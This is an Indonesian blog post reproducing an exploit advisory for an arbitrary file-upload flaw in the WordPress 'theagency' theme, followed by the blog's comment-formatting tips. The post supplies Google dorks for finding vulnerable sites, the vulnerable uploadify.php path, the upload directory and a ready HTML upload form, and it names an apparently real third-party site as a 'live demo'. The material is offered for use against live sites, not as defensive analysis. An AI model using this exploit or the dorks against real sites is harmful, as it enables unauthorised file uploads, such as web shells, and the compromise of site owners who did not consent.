Wordpress Themes Theagency File Upload Vulnerability

Daftar Isi Artikel


##################################################################################
# Exploit Title : Wordpress Themes Theagency File Upload Vulnerability
# Author : Berandal
# Google Dork 1: inurl:/wp-content/themes/theagency 

# Or " index of /wp-content/themes/theagency "
# Tested on: Win 7, Linux
# Blog : http://www.maxteroit.com/
# Video Proof : https://www.youtube.com/watch?v=Iuhj5wDOLbU
#################################################################################

# [!] Exploit : http://127.0.0.1/wordpress/wp-content/themes/theagency/includes/uploadify/uploadify.php

# [!] File Location : http://127.0.0.1/wp-content/themes/theagency/includes/uploadify/uploads/filename

#################################################################################
# [*] CSRF:
#################################################################################
<html>
<body>
<form action="http://127.0.0.1/wp-content/themes/theagency/includes/uploadify/uploadify.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="SIKAT!">
</form>
</body>
</html>

#################################################################################
# [*] Live Demo:
# http://birtandalgic.com/
#################################################################################
# [*] ABOUT:
###############################################################

★★★★

Silahkan Komentar dengan bahasa yang sopan :)

  1. Untuk membuat judul komentar, gunakan <i rel="h2">Judul Komentar</i>
  2. Untuk membuat kotak catatan, <i rel="quote">catatan</i>
  3. Untuk membuat teks stabilo, <i rel="mark">mark</i>
  4. Untuk membuat teks mono, <i rel="kbd">kbd</i>
  5. Untuk membuat kode singkat, <i rel="code">shorcode</i>
  6. Untuk membuat kode panjang, <i rel="pre"><i rel="code">potongan kode</i></i>
  7. Untuk membuat teks tebal, <strong>tebal</strong> atau <b>tebal</b>
  8. Untuk membuat teks miring, <em>miring</em> atau <i>miring</i>